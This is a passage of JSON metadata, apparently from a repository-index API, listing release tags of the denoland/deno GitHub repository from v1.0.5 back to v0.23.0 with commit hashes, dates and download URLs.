52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"